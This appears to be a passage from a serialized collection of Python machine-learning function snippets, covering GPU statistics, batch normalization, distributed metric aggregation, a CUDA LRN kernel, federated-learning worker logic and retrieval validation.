stats_config):\n raw_output = self.run_command([\n '--query-gpu={query_gpu}'.format(query_gpu=','.join(stats_config)),\n '--format=csv,nounits,noheader'\n ])\n\n if raw_output is None:\n return\n\n results = raw_output[0].strip().split(\"\\n\")\n for result in results:\n stats = result.strip().split(',')\n assert len(stats) == len(stats_config)\n index = stats[0]\n for stat_name, metric in izip(stats_config[1:], stats[1:]):\n metric_name = 'gpu_{index}.{stat_name}'.format(\n index=str(index),\n stat_name=stat_name\n )\n self.publish(metric_name, metric)", "def calc_contributions(self):\n\n if self.iterations >= self.statistics_batch_num:\n return\n for wrapper in self.get_modules_wrapper():\n filters = wrapper.module.weight.size(0)\n contribution = (wrapper.module.weight*wrapper.module.weight.grad).data.pow(2).view(filters, -1).sum(dim=1)\n if wrapper.contribution is None:\n wrapper.contribution = contribution\n else:\n wrapper.contribution += contribution\n\n self.iterations += 1", "def multi_gpu_generate_rpn_on_dataset(\n args, dataset_name, proposal_file, num_images, output_dir):\n # Retrieve the test_net binary path\n binary_dir = envu.get_runtime_dir()\n binary_ext = envu.get_py_bin_ext()\n #TODO note that code can only be run from root_dir!!\n binary = os.path.join(binary_dir, 'tools/test_net' + binary_ext)\n assert os.path.exists(binary), 'Binary \\'{}\\' not found'.format(binary)\n\n # Pass the target dataset via the command line\n opts = ['TEST.DATASETS', '(\"{}\",)'.format(dataset_name)]\n\n # Run inference in parallel in subprocesses\n outputs = subprocess_utils.process_in_parallel(\n 'rpn_proposals', num_images, binary, output_dir,\n args.load_ckpt, args.load_detectron, opts\n )\n\n # Collate the results from each subprocess\n boxes, scores, ids = [], [], []\n for rpn_data in outputs:\n boxes += rpn_data['boxes']\n scores += rpn_data['scores']\n ids += rpn_data['ids']\n rpn_file = os.path.join(output_dir, 'rpn_proposals.pkl')\n cfg_yaml = yaml.dump(cfg)\n save_object(\n dict(boxes=boxes, scores=scores, ids=ids, cfg=cfg_yaml), rpn_file\n )\n logger.info('Wrote RPN proposals to {}'.format(os.path.abspath(rpn_file)))\n return boxes, scores, ids, rpn_file", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def __call__(self, epoch, update):\n count = 0\n ii = 1\n\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n\n while True:\n i,p = next(self.gen)\n if p.poll():\n count += 1\n grads =[]\n for i,fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs*4)\n grads.append(np.ndarray(self.shapes[i],np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv() #only marginal gains her in the e-05s not worth the complexity to doing it with recv_bytes\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n else:\n ii += 1\n if ii %self.learners == 0:\n time.sleep(0.0001)\n\n if self.warm_start and self.epochs >= epoch:\n if count == self.learners:\n return gradients_list, from_list, global_update_list ,step_list, metrics_list, 0, 2\n else:\n if count == self.num:\n return gradients_list, from_list, global_update_list,step_list, metrics_list, 0, 2", "def _get_fprop_lrn(clss, compute_capability):\n code = r\"\"\"\n%(common)s\n\n__global__ void spool_fprop_lrn(\n const %(type)s* I, %(type)s* O, %(type)s* A,\n float alpha, float beta, float ascale, float bpower, int flags,\n int N, int W, int H, int D, int C,\n int WN, int HWN, int DHWN, int P, int Q,\n int magic_P, int shift_P, int QN, int PQN, int MPQN,\n int pad_c, int pad_d, int pad_h, int pad_w,\n int str_c, int str_d, int str_h, int str_w,\n int S, int RS, int RST, int JRST,\n int magic_S, int shift_S,\n int magic_RS, int shift_RS, int magic_RST, int shift_RST,\n int supP, int supQ, int shlP, int maskP, int shrP,\n int shlQ, int maskQ, int shrQ, int maskN, int shrN\n %(stats_args)s\n )\n{\n __shared__ float rcpWindowSize;\n extern __shared__ int lut[];\n\n int tid = threadIdx.x;\n\n // paralellism is over QMPK dimensions (output pixels and ofm's)\n int n = tid;\n int q = blockIdx.x;\n int mp = blockIdx.y;\n int k = blockIdx.z;\n\n int m = mp * magic_P; m >>= shift_P;\n int p = mp - m*P;\n\n // zigzag q back and forth to improve L2 cache perf\n if (p & 1)\n q = Q - q - 1;\n\n const %(type)s* IonO = I; // input pixel at output location\n I += n;\n IonO += k*MPQN + m*PQN + p*QN + q*N + n;\n O += k*MPQN + m*PQN + p*QN + q*N + n;\n A += k*MPQN + m*PQN + p*QN + q*N + n;\n\n float O_val = beta != 0.0f ? %(cvt)s(__ldg(O)) : 0.0f;\n\n if (tid < 32)\n {\n int kj = k * str_c - pad_c;\n int mt = m * str_d - pad_d;\n int pr = p * str_h - pad_h;\n int qs = q * str_w - pad_w;\n\n int window_size = 0;\n int jrst = tid;\n // this loop generates the LUT (same for pooling and normalization)\n while (jrst < JRST)\n {\n int j = jrst * magic_RST; j >>= shift_RST;\n int rst = jrst - j * RST;\n\n int t = rst * magic_RS; t >>= shift_RS;\n int rs = rst - t * RS;\n\n int r = rs * magic_S; r >>= shift_S;\n int s = rs - r*S;\n\n int x = qs + s;\n int y = pr + r;\n int z = mt + t;\n int c = kj + j;\n\n bool bounds_x = x >= 0 && x < W;\n bool bounds_y = y >= 0 && y < H;\n bool bounds_z = z >= 0 && z < D;\n bool bounds_c = c >= 0 && c < C;\n bool in_bounds = bounds_x && bounds_y && bounds_z && bounds_c;\n\n // Count the total valid slices\n window_size += __popc(__ballot(in_bounds));\n\n int sliceI = c*DHWN + z*HWN + y*WN + x*N;\n\n lut[jrst] = in_bounds ? sliceI : -1;\n jrst += 32;\n }\n\n if(tid == 0)\n {\n //rcpWindowSize = 1.0f / (float)window_size;\n rcpWindowSize = (float)RST/(float)JRST;\n }\n }\n __syncthreads();\n\n float out = 0.0f;\n float denom;\n float sumsquare = 0.0f;\n float input = 0.0f;\n int jrst = 0;\n while (jrst < JRST)\n {\n int slice0 = lut[jrst + 0];\n int slice1 = lut[jrst + 1];\n int slice2 = lut[jrst + 2];\n int slice3 = lut[jrst + 3];\n\n // TODO: May not need to load all slices if they are not used.\n input = jrst + 0 < JRST && slice0 >= 0 ? %(cvt)s(__ldg(I + slice0)) : 0.0f;\n sumsquare += jrst + 0 < JRST && slice0 >= 0 ? input * input: 0.0f;\n input = jrst + 1 < JRST && slice1 >= 0 ? %(cvt)s(__ldg(I + slice1)) : 0.0f;\n sumsquare += jrst + 1 < JRST && slice1 >= 0 ? input * input: 0.0f;\n input = jrst + 2 < JRST && slice2 >= 0 ? %(cvt)s(__ldg(I + slice2)) : 0.0f;\n sumsquare += jrst + 2 < JRST && slice2 >= 0 ? input * input: 0.0f;\n input = jrst + 3 < JRST && slice3 >= 0 ? %(cvt)s(__ldg(I + slice3)) : 0.0f;\n sumsquare += jrst + 3 < JRST && slice3 >= 0 ? input * input: 0.0f;\n\n jrst += 4;\n }\n\n denom = (1 + ascale*sumsquare*rcpWindowSize);\n out = %(cvt)s(__ldg(IonO)) / powf(denom, bpower);\n\n\n // convert back to fp to write out\n %(type)s temp_out = %(cvt_out)s( %(mul_by_scale)s (out*alpha + O_val*beta));\n\n // predicate write with no-op flag\n if (!(flags & 1)) {\n *O = temp_out;\n *A = %(cvt_out)s( %(mul_by_scale)s denom ); // write the denomiantor to address\n }\n\n // collect max abs stats\n int intermediate_max = max_abs(0, temp_out); // compute abs\n %(atomic_max)s\n}\n\"\"\"\n\n template_vals = prepare_template_vals(clss, compute_capability)\n code = code % template_vals\n module = SourceModule(code)\n kernel = module.get_function(\"spool_fprop_lrn\")\n kernel.prepare(\"3P 4f 34I 10I\" + flex_sig(clss[0])) # add superblocking parameter\n return kernel", "def _compute_outputs(self, *args, **kwargs):\n pass\n # self.outputs = self.model(input_ids=self.input_ids, masked_lm_labels=self.input_ids)\n # self.logits = self.outputs[0][0]\n # self.probs = torch.softmax(self.logits, 1)", "def run_bp(self, niter):\n for v in self.vs.values():\n v.init_received()\n for f in self.fs:\n f.init_received()\n marg = {v: self.get_marginal(v) for v in self.vs}\n for it in range(niter):\n for v in self.vs.values():\n v.send()\n for f in self.fs:\n f.send()\n for v in self.vs:\n marg[v] = np.vstack((marg[v], self.get_marginal(v)))\n domains = {v.name: v.orig_domain for v in self.vs.values()}\n return (marg, domains, self.vobs)", "def _compute(self, global_step, params, batch_loss):\n individual_losses = get_individual_losses(global_step)\n individual_gradients = autograd_individual_gradients(individual_losses, params)\n layerwise = [\n self._compute_histogram(p, igrad)\n for p, igrad in zip(params, individual_gradients)\n ]\n\n hist = sum(out[0] for out in layerwise)\n edges = layerwise[0][1]\n\n result = {\"hist\": hist, \"edges\": edges}\n\n if self._keep_individual:\n result[\"param_groups\"] = len(params)\n\n for idx, (hist, edges) in enumerate(layerwise):\n result[f\"param_{idx}\"] = {\"hist\": hist, \"edges\": edges}\n\n return result", "def update_probs(self, measure, p, enemy_net = False):\n tmp_net = []\n net_size = len(self.net) \n if not enemy_net:\n net = self.net\n else:\n net = self.enemy_net\n #Maps a given color to its corresponding column in the color's \n #probability table.\n if measure == GREEN:\n color = 0\n elif measure == YELLOW:\n color = 1\n elif measure == ORANGE:\n color = 2\n elif measure == RED:\n color = 3\n #Obtains new probabilities by using the distance between the\n #observed position (the one measured) and any other position.\n for j in range(0, net_size):\n distance = self.__get_distance(p, j)\n if distance == 0: #When updating the measured position's probability.\n tmp_net.append(net[j].value * self.ct[0][color])\n elif distance == 1: #When updating an adjacent position to the one measured.\n tmp_net.append(net[j].value * self.ct[1][color])\n elif distance == 2: #When updating a position at two cells from the one measured.\n tmp_net.append(net[j].value * self.ct[2][color])\n elif distance == 3: #When updating a position at three cells from the one measured.\n tmp_net.append(net[j].value * self.ct[3][color])\n else: #When updating a position at four or more cells from the one measured.\n tmp_net.append(net[j].value * self.ct[4][color])\n #Obtains summation of new probabilities in order to execute \n #a posterior normalization.\n total = sum(tmp_net)\n #Normalizes new probabilities and assigns them to its \n #corresponding position.\n for i in range(0, net_size):\n net[i].value = tmp_net[i]/total", "def update_concentrations_batch(self): \n #--- Update the cell concentrations ---\n # dX_i/dt = mu_i*(1-rmp/100)*X_i*(1 - sum(i,(1-rmp/100)X(i))/carrying_capacity) or \n # (X_i(t+dt) - X_i(t))/dt = mu*(1-rmp/100)*X_i(t)*(1 - sum(i,(1-rmp/100)*X_i(t))/carrying_capacity)\n # where rmp is the random mortality percentage\n # If concentration is negative set it to zero\n members_gDW_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_gDW_per_ml = 1 - members_gDW_per_ml_total/self.carrying_capacity['gDW_per_ml']\n if len([member for member in self.community_members if member.organism.cells_per_ml != None]) == len(self.community_members):\n members_cells_per_ml_total = sum([(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t] for member in self.community_members])\n self._logisticG_factor_cells_per_ml = 1 - members_cells_per_ml_total/self.carrying_capacity['cells_per_ml']\n\n for member in self.community_members:\n # We always need gDW_per_ml to update compound concentrations but\n # providing cells_per_ml is optional\n member.organism.gDW_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1-self.random_mortality_percentage/100)*member.organism.gDW_per_ml[self._t]*self._logisticG_factor_gDW_per_ml*self._dt + member.organism.gDW_per_ml[self._t],0)\n\n if member.organism.cells_per_ml is not None:\n member.organism.cells_per_ml[self._t + self._dt] = max(member.organism.mu[self._t]*(1 - self.random_mortality_percentage/100)*member.organism.cells_per_ml[self._t]*self._logisticG_factor_cells_per_ml*self._dt + member.organism.cells_per_ml[self._t],0)\n\n # Total death rate (** newly added for DMMM_mortality **)\n if member.organism.mu[self._t] < 0:\n # In thise case random_mortality_rate has already been incorporated into mu\n # (see DMMM.py)\n member.organism.total_death_rate[self._t] = member.organism.mu[self._t] \n else:\n member.organism.total_death_rate[self._t] = member.organism.random_mortality_rate\n\n\n #--- Update shared compound concentrations ---\n # dC/dt = f where, f = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool_rate\n # (C(t+dt) - c(t))/dt = sum(k,v_export_k*X_k) - sum(k,v_uptake_k*X_k) + dead_pool \n # where, dead_pool_rate = sum(k,-self.cell_pool_factor*cell_pool_concentration_k*total_death_rate_k*X_k)\n # Here, cell_pool_concentration is the concentration of the compound pool \n # per gDW or per cells, which should have already been assigned to each \n # shared compound. The minus sign is because total_death_rate is negative\n # while dead_pool_rate must be non-negative. Here, self.cell_pool_factor is\n # the factor that should be multiplied by concentration of that compound \n # (this is because sometimes we want to explore how the growth is affected if \n # the cell pool is higher than the ones reported experimentally)\n total_cmps_conc = sum([cmp.concentration[self._t] for cmp in self.shared_compounds])\n self._logisticG_factor_cmps = 1 - total_cmps_conc/self.carrying_capacity['compounds_mM']\n self._f = dict([(cmp,None) for cmp in self.shared_compounds])\n\n if not hasattr(self,'cell_pool_factor'):\n self.cell_pool_factor = 1\n\n for shared_cmp in self.shared_compounds:\n dead_pool_rate = -sum([self.cell_pool_factor*shared_cmp.cell_pool_concentration[member.organism.id]*member.organism.total_death_rate[self._t]*1000*member.organism.gDW_per_ml[self._t] for member in self.community_members])\n if dead_pool_rate < 0:\n raise userError('dead_pool_rate is negative')\n\n f = sum([r.flux[self._t]*1000*r.model.organism.gDW_per_ml[self._t] for r in shared_cmp.reactions]) + dead_pool_rate\n self._f[shared_cmp] = f\n\n conc = f*self._logisticG_factor_cmps*self._dt + shared_cmp.concentration[self._t]\n\n if conc >= 0 or (conc < 0 and abs(conc) <= 1e-9):\n conc = max(conc,0)\n\n shared_cmp.concentration[self._t + self._dt] = conc", "def bn_update(loader, model, device):\n if not check_bn(model):\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n print('no bn in model?!')\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>!')\n # return model\n\n model.train()\n momenta = {}\n model.apply(reset_bn)\n model.apply(lambda module: _get_momenta(module, momenta))\n n = 0\n\n model = model.to(device)\n pbar = tqdm(loader, unit=\"samples\", unit_scale=loader.batch_size)\n for sample in pbar:\n inputs, targets, target_lengths = sample['input'].to(device), sample['label'].to(device), sample['label_length'].to(device)\n\n inputs = inputs.to(device)\n b = inputs.size(0)\n\n momentum = b / (n + b)\n for module in momenta.keys():\n module.momentum = momentum\n\n # model(inputs)\n # TODO:\n model(inputs, False, targets, target_lengths, 275, test_dataset.tokenizer)\n n += b\n\n model.apply(lambda module: _set_momenta(module, momenta))\n return model", "def benchmark_ng_xla_batch64_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, batch_size=64, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n model='resnet50', batch_size=128, distortions=False,\n optimizer='momentum')", "def batchnorm_compute(self):\n self.batchnorm_compute_tiling_wh_single_c()\n\n self.tik_instance.BuildCCE(kernel_name=self.kernel_name,\n inputs=[self.input_gm,\n self.gamma_gm,\n self.beta_gm],\n outputs=[self.output_gm],\n flowtable=[self.input_n, self.input_c,\n self.input_h, self.input_w,\n self.inputtype, self.output_n,\n self.output_c, self.output_h,\n self.output_w, self.outputtype,\n self.gamma_c, self.gammatype,\n self.beta_c, self.betatype,\n self.param1, self.param2,\n self.param3, self.param4,\n self.param5, self.param6,\n self.param7, self.param8,\n self.param9, self.param10],\n enable_l2=True,\n config={\"double_buffer_non_reuse\": True,\n \"out_of_bound_sync_check\": True})\n return self.tik_instance", "def calculate_batch_metrics(self):\n pass", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(_get_gp_ucb_dim(gp), anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" A UCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, _get_gp_ucb_dim(gp))))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n #######################################################################\n #Compute mean and variance of each element of the data.\n sample_mean = np.mean(x,axis = 0)\n sample_var = np.var(x,axis = 0)\n #Normalize\n x_normalized = (x - sample_mean) / (np.sqrt(sample_var + eps))\n #scale and shift.\n out = x_normalized * gamma + beta\n #Update running mean and variance.\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(sample_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n #Normalize with running mean and var.\n x_normalized = (x - running_mean) / (np.sqrt(running_var + eps))\n #scale and shift.\n out = gamma * x_normalized + beta\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(running_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def run(self):\n # Single GPU flag\n single_gpu = True if size()==1 else False\n print_rank(f\"Single GPU flag Client: {single_gpu}\", loglevel=logging.DEBUG)\n \n if not single_gpu:\n while True: # keeps listening for incoming server calls\n\n # Initialize tensors -- required by torch.distributed\n command, client_idx, mode = 0, 0, 0 # int\n lr, nround = torch.zeros(1), torch.zeros(1) # float\n\n # Read command\n command = _recv(command)\n print_rank(f\"Command received {command} on worker {rank()}\", loglevel=logging.DEBUG)\n\n # Receive server data -- lr, model_params\n if command == COMMAND_UPDATE:\n print_rank(f\"COMMMAND_UPDATE received {rank()}\", loglevel=logging.DEBUG) \n lr = _recv(lr, 0)\n model_params = _recv_gradients(0)\n nround = _recv(nround, 0)\n server_data = (lr, model_params, int(nround))\n print_rank(f\"Received lr: {lr} and n_params: {len(model_params)} - round {nround}\", loglevel=logging.DEBUG)\n \n elif command == COMMAND_TRAIN:\n print_rank(f\"COMMMAND_TRAIN received {rank()}\", loglevel=logging.DEBUG)\n \n # Init profiler in training worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive client id from Server\n client_idx = _recv(client_idx)\n print_rank(f\"Cliend idx received from Server: {client_idx}\", loglevel=logging.DEBUG)\n\n # Instantiate client\n client_to_process = Client(\n [client_idx],\n self.config,\n self.config['client_config']['type'] == 'optimization') \n \n # Execute Client.get_data()\n client_data = client_to_process.get_client_data()\n\n # Execute Client.process_round()\n output = client_to_process.process_round(client_data, server_data, self.model, self.data_path)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_train_output(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TESTVAL:\n print_rank(f\"COMMMAND_TESTVAL received {rank()}\", loglevel=logging.DEBUG)\n\n # Init profiler in validation worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive mode and client id from Server\n mode = _recv(mode)\n mode = \"test\" if mode == -2 else \"val\"\n client_idx = _recv(client_idx)\n print_rank(f\"Client idx received from Server: {client_idx}, {mode}\", loglevel=logging.DEBUG)\n \n # Get client and dataset\n clients = self.val_clients if mode == \"val\" else self.test_clients\n dataset = self.val_dataset if mode == \"val\" else self.test_dataset\n clients_queue = clients.copy()\n assert 0 <= client_idx < len(clients_queue)\n client_to_process = clients_queue.pop(client_idx)\n\n # Execute Client.get_data()\n client_data = client_to_process.get_client_data(dataset)\n \n # Execute Client.run_testvalidate()\n output = client_to_process.run_testvalidate(client_data, server_data, mode, self.model)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n _, metrics, num_instances = output\n metrics['num']= {'value': float(num_instances), 'higher_is_better': False}\n output = metrics\n print_rank(f\"Worker {rank()} output {output}\", loglevel=logging.DEBUG)\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_metrics(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker {rank()} sent output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TERMINATE:\n print_rank(f\"COMMMAND_TERMINATE received {rank()}\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n return\n\n elif command == COMMAND_SYNC_NODES: # Only for sync calls\n print_rank(f\"COMMMAND_SYNC_NODES received {rank()}\", loglevel=logging.DEBUG)\n\n gather_objects = [None for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker IDLE {rank()} sent dummy output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n else:\n assert False, \"unknown command\"", "def validate_average_rank(self) -> float:\n logger.info('Average rank validation ...')\n\n args = self.args\n self.biencoder.eval()\n distributed_factor = self.distributed_factor\n\n if args.use_dict_input:\n data_iterator = self.get_dict_data_iterator(args.dev_psgs_file, args.dev_queries_file,\n args.dev_qrels_file, args.dev_trec_file,\n args.dev_batch_size,\n shuffle=False, split=False)\n else:\n data_iterator = self.get_data_iterator(args.dev_file, args.dev_batch_size, shuffle=False)\n\n sub_batch_size = args.val_av_rank_bsz\n sim_score_f = ClusterNllLoss.get_similarity_function()\n q_represenations = []\n ctx_represenations = []\n positive_idx_per_question = []\n\n num_hard_negatives = args.val_av_rank_hard_neg\n num_other_negatives = args.val_av_rank_other_neg\n\n log_result_step = args.log_batch_step\n\n for i, samples_batch in enumerate(data_iterator.iterate_data()):\n # samples += 1\n if len(q_represenations) > args.val_av_rank_max_qs / distributed_factor:\n break\n\n biencoder_input = ClusterBertEncoder.create_biencoder_input(samples_batch, self.tensorizer,\n True,\n max_query_length=args.query_sequence_length,\n max_doc_length=args.sequence_length,\n num_hard_negatives=num_hard_negatives,\n num_other_negatives=num_other_negatives,\n shuffle=False)\n total_ctxs = len(ctx_represenations)\n ctxs_ids = biencoder_input.context_ids\n ctxs_segments = biencoder_input.ctx_segments\n bsz = ctxs_ids.size(0)\n\n # split contexts batch into sub batches since it is supposed to be too large to be processed in one batch\n for j, batch_start in enumerate(range(0, bsz, sub_batch_size)):\n\n q_ids, q_segments = (biencoder_input.question_ids, biencoder_input.question_segments) if j == 0 \\\n else (None, None)\n\n if j == 0 and args.n_gpu > 1 and q_ids.size(0) == 1:\n # if we are in DP (but not in DDP) mode, all model input tensors should have batch size >1 or 0,\n # otherwise the other input tensors will be split but only the first split will be called\n continue\n\n ctx_ids_batch = ctxs_ids[batch_start:batch_start + sub_batch_size]\n ctx_seg_batch = ctxs_segments[batch_start:batch_start + sub_batch_size]\n\n q_attn_mask = self.tensorizer.get_attn_mask(q_ids)\n ctx_attn_mask = self.tensorizer.get_attn_mask(ctx_ids_batch)\n with torch.no_grad():\n q_dense, ctx_dense = self.biencoder(q_ids, q_segments, q_attn_mask, ctx_ids_batch, ctx_seg_batch,\n ctx_attn_mask)\n\n if q_dense is not None:\n q_represenations.extend(q_dense.cpu().split(1, dim=0))\n\n ctx_represenations.extend(ctx_dense.cpu().split(1, dim=0))\n\n batch_positive_idxs = biencoder_input.is_positive\n positive_idx_per_question.extend([total_ctxs + v for v in batch_positive_idxs])\n\n if (i + 1) % log_result_step == 0:\n logger.info('Av.rank validation: step %d, computed ctx_vectors %d, q_vectors %d', i,\n len(ctx_represenations), len(q_represenations))\n\n ctx_represenations = torch.cat(ctx_represenations, dim=0)\n q_represenations = torch.cat(q_represenations, dim=0)\n\n logger.info('Av.rank validation: total q_vectors size=%s', q_represenations.size())\n logger.info('Av.rank validation: total ctx_vectors size=%s', ctx_represenations.size())\n\n q_num = q_represenations.size(0)\n assert q_num == len(positive_idx_per_question)\n\n scores = sim_score_f(q_represenations, ctx_represenations)\n values, indices = torch.sort(scores, dim=1, descending=True)\n\n rank = 0\n for i, idx in enumerate(positive_idx_per_question):\n # aggregate the rank of the known gold passage in the sorted results for each question\n gold_idx = (indices[i] == idx).nonzero()\n rank += gold_idx.item()\n\n if distributed_factor > 1:\n # each node calcuated its own rank, exchange the information between node and calculate the \"global\" average rank\n # NOTE: the set of passages is still unique for every node\n eval_stats = all_gather_list([rank, q_num], max_size=1000)\n for i, item in enumerate(eval_stats):\n remote_rank, remote_q_num = item\n if i != args.local_rank:\n rank += remote_rank\n q_num += remote_q_num\n\n av_rank = float(rank / q_num)\n logger.info('Av.rank validation: average rank %s, total questions=%d', av_rank, q_num)\n return av_rank", "def main():\n\n global G\n global C\n global D\n\n global device\n\n global c_solver\n global g_solver\n global d_optimiser\n\n global BCELossFunc\n\n # define random seed to allow reporducibility\n seed = 97\n torch.manual_seed(seed)\n random.seed(seed)\n\n # optimise for GPU learned from Vanilla GAN tutorial:\n # https://medium.com/ai-society/gans-from-scratch-1-a-deep-introduction-with-code-in-pytorch-and-tensorflow-cb03cdcdba0f\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and NUM_GPUS > 0) else \"cpu\")\n\n # Generator\n G = Generator(NUM_GPUS).to(device)\n G.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n G = nn.DataParallel(G, list(range(NUM_GPUS)))\n\n # Discriminator\n C = Critic(NUM_GPUS).to(device)\n C.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 